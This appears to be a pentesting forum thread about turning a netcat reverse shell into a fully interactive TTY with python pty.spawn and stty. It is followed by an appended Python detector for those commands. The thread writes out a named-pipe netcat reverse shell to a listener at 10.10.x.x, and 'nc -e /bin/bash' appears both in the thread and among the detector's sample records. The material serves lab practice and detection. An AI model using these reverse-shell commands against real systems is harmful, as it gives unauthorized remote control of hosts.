Obtaining a Fully Interactive Shell

You won't always have Python, so this is a good resource to have bookmarked:
https://netsec.ws/?p=337

@princeade said:
Guys, nicely put. I once was looking for how to nano a file through a shell (not SSH)… had to finally echo my code into the file on the PWK labs…

question: Does this work for all reverse shell gotten through other means like (php, perl and python) or only nc shells?

The majority of connect back shells should work fine. I meant nc as the listening service on the local machine. Refer to the netsec.ws link that @sajkox posted to see other options.

I've tried the above method a few times, but it failed every time. I don't understand what I am doing wrong…
After doing fg, the Enter key is displayed as ^M.
Something like this:

$ fg
                           clear^M

Have a look at ippsec’s video to see it in action: Joker

Note he did /bin/sh in pty.spawn. Should have been /bin/bash

I too do /bin/bash every time I try…
I’ve followed all his tutorials so far and I’ve tried to imitate it.
No luck so far…

What machine are you trying this on, what kind of reverse connection and what are you using for a listener?

I tried this on Parrot OS, which is Debian based with the MATE DE.
And the reverse connection was:

mknod /tmp/backpipe p; /bin/sh 0< /tmp/backpipe | nc 10.10.x.x 4000 1> /tmp/backpipe

And listening with:

nc -nvlp 4000

Hmm, works for me with that exact connect back method in Kali. Tested on CronOS:

This is what’s happening at my end

I got the same output when I tried with some of the HTB machines.

@hkh4cks it might be down to ohmyzsh I think

Great find @sajkox ! :smiley:
That was the issue…
Thank you guys for looking into it :slight_smile:

@hkh4cks try pressing enter a couple times after foregrounding the process

Nice thread guys… My 2 coins…

stty rows 50 cols 200

This fixes the rows/cols of your terminal. Especially useful when you run ps, so you can see the full length of the process command.

You can also play with the TERM env variable if it isn't set already, e.g. export TERM=xterm

@PinkPanther it worked when I switched to bash from zsh.
Nice tip @SuRGeoNix

What about -e /bin/bash?

Hi all,

you can have a TTY in an HTTP shell or web-based shell by providing credentials. That is useful in case the server is dropping requests on other ports, etc.

Bump, as several people have been asking about this topic recently

Hi @hkh4cks
How did you fix the ohmyzsh error with the netcat shell after doing fg?
Can't find anything to fix that.

I came across this while trying to solve similar issues; it might help others. There are a few additional commands beyond what is listed in the first post.

• On the remote machine, run python -c 'import pty; pty.spawn("bash")' and press CTRL-z to put the SSH session into the background.
• Then run stty -a to print out information about your shell. Note the rows and columns (say they are 40 and 160 respectively).
• Now run stty raw -echo to put your shell into raw mode, then fg to get back into the SSH session, and finally reset to reset the shell. If you get asked for the type of the terminal, use xterm-256color.
• After that, run stty rows 40 columns 160 to specify the correct size. You should now have a fully working shell; in particular vi should work.

That’s a great thing to share, so here are my two cents:

  • Spawning bash with python:
$ python -c 'import pty; pty.spawn("/bin/bash")'
  • Background’ing the remote shell with CTRL-Z:
user@remote:~$ ^Z
  • Getting ROWS and COLS within current terminal window:
user@local:~$ stty -a | head -n1 | cut -d ';' -f 2-3 | cut -b2- | sed 's/; /\n/'
  • Ignoring hotkeys in the local shell and getting back to the remote:
user@local:~$ stty raw -echo; fg
  • Setting correct size for the remote shell (where ROWS and COLS are the values from the 3rd bullet):
user@remote:~$ stty rows ROWS cols COLS
  • Adding some colors:
user@remote:~$ export TERM=xterm-256color
  • Reloading bash to apply the TERM variable:
user@remote:~$ exec /bin/bash

:triumph:
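Added example (not from this thread or from any poster): a small Python detector for the other side of the table, flagging the backpipe/nc connect-back, nc -e, and python pty.spawn commands discussed above in process-execution records, and correlating a connect-back followed by pty.spawn under the same uid. The `<ts> uid=<n> comm=<name> cmd=<command line>` record format and the sample records are constructed for illustration; adapt the parser to your own execve/auditd telemetry.

```python
import re
from datetime import datetime

RULES = [  # (name, regex applied to the command line)
    ("pty_spawn", re.compile(r"import\s+pty\s*;\s*pty\.spawn\s*\(")),                 # shell wrapped in a pty
    ("fifo_connectback", re.compile(r"\b(mknod\s+\S+\s+p|mkfifo\s+\S+)\b.*\bnc\b")),   # named pipe wired into nc
    ("nc_exec_shell", re.compile(r"\bnc\b.*\s-e\s+\S*sh\b")),                           # nc -e <shell>
]
CONNECTBACK = {"fifo_connectback", "nc_exec_shell"}

# Assumed (constructed) record format: "<iso-ts> uid=<n> comm=<name> cmd=<command line>".
LINE_RE = re.compile(r"^(?P<ts>\S+) uid=(?P<uid>\d+) comm=(?P<comm>\S+) cmd=(?P<cmd>.*)$")


def scan(lines):
    """Return (ts, uid, rule_name, cmd) for every rule each record matches."""
    hits = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # unparseable record: skip rather than guess
        for name, pattern in RULES:
            if pattern.search(m.group("cmd")):
                hits.append((m.group("ts"), int(m.group("uid")), name, m.group("cmd")))
    return hits


def correlate(hits, window_s=60):
    """Return uids where a connect-back hit is followed by pty_spawn within window_s seconds."""
    def t(ts):
        return datetime.fromisoformat(ts.replace("Z", "+00:00"))
    flagged = set()
    for ts1, uid, rule, _ in hits:
        if rule in CONNECTBACK and any(
            u == uid and r == "pty_spawn" and 0 <= (t(ts2) - t(ts1)).total_seconds() <= window_s
            for ts2, u, r, _ in hits
        ):
            flagged.add(uid)
    return flagged


# Constructed sample records (not real telemetry); uid 33 stands for the web server user.
SAMPLE_LOG = [
    "2024-01-01T10:00:01Z uid=33 comm=sh cmd=mknod /tmp/backpipe p; /bin/sh 0< /tmp/backpipe | nc 10.10.x.x 4000 1> /tmp/backpipe",
    "2024-01-01T10:00:05Z uid=33 comm=python cmd=python -c 'import pty; pty.spawn(\"/bin/bash\")'",
    "2024-01-01T10:00:09Z uid=33 comm=bash cmd=stty rows 40 cols 160",
    "2024-01-01T10:01:00Z uid=1000 comm=python cmd=python -c 'import sys; print(sys.version)'",
    "2024-01-01T10:02:00Z uid=33 comm=sh cmd=nc -e /bin/bash 10.10.x.x 4000",
]
```

The stty resize and TERM export from the thread are deliberately not rules: interactive users run them too, so they only add noise next to the connect-back and pty.spawn signals.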